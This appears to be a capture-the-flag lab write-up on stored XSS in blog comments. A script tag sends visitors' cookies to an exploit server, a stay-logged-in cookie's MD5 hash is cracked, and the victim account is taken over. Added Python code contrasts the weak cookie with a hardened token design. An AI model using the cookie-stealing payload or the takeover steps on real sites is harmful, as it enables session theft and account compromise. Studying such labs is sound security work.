We discovered that the comment section of posts is vulnerable to stored XSS using a simple alert box payload:

We used the following payload to steal cookies from users visiting the site:

<script>
new Image().src = 'https://exploit-0a6d009f04594f8080605c8e01d2001c.exploit-server.net/?c='+ document.cookie;
</script>

Publishing it as a comment on a random post allowed us to capture requests on the attacker-controlled exploit server. We observed internal IPs making GET requests with the secret and stay-logged-in cookies:

Decoding the stay-logged-in cookie revealed the format username:md5(password) for the user:

We identified the username carlos and cracked the MD5 hash using CrackStation, allowing us to log in as Carlos:

After logging in, we deleted Carlos’ account and successfully solved the lab:
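The two weaknesses chained above are the cookie being readable from document.cookie and the stay-logged-in value carrying a crackable password hash. The following is an added example, not code from the lab or the original writeup: it reproduces the weak cookie format to show exactly what a captured value exposes, then contrasts it with a remember-me design (an assumed design, not the lab's) that issues a random opaque token, stores only its SHA-256 on the server with an expiry, and sets the cookie HttpOnly so an injected script cannot read it.

```python
import base64
import hashlib
import secrets
import time
from typing import Optional

# Weak scheme described in the writeup: base64(username ":" md5(password)).
# Anyone who captures this cookie gets the username and an offline-crackable hash.
def weak_stay_logged_in(username: str, password: str) -> str:
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()

def inspect_weak_cookie(cookie: str) -> tuple[str, str]:
    """What a captured weak cookie reveals: the username and the raw MD5 digest."""
    user, digest = base64.b64decode(cookie).decode().split(":", 1)
    return user, digest

# Hardened alternative (assumed design): an opaque random token that contains no
# credential material. The server stores only sha256(token) -> (username, expiry),
# so neither a stolen cookie nor a leaked token table yields a password hash.
_token_store: dict[str, tuple[str, float]] = {}

def issue_remember_me(username: str, ttl_seconds: int = 7 * 24 * 3600,
                      now: Optional[float] = None) -> str:
    token = secrets.token_urlsafe(32)          # 256 bits of randomness, URL-safe alphabet
    key = hashlib.sha256(token.encode()).hexdigest()
    _token_store[key] = (username, (now if now is not None else time.time()) + ttl_seconds)
    return token

def verify_remember_me(token: str, now: Optional[float] = None) -> Optional[str]:
    key = hashlib.sha256(token.encode()).hexdigest()
    entry = _token_store.get(key)
    if entry is None:
        return None
    username, expiry = entry
    if (now if now is not None else time.time()) > expiry:
        _token_store.pop(key, None)            # expired tokens are single-use garbage
        return None
    return username

def set_cookie_header(name: str, value: str) -> str:
    # HttpOnly keeps the value out of document.cookie; Secure and SameSite limit
    # where it travels. This alone would have blunted the cookie-theft payload above.
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"
```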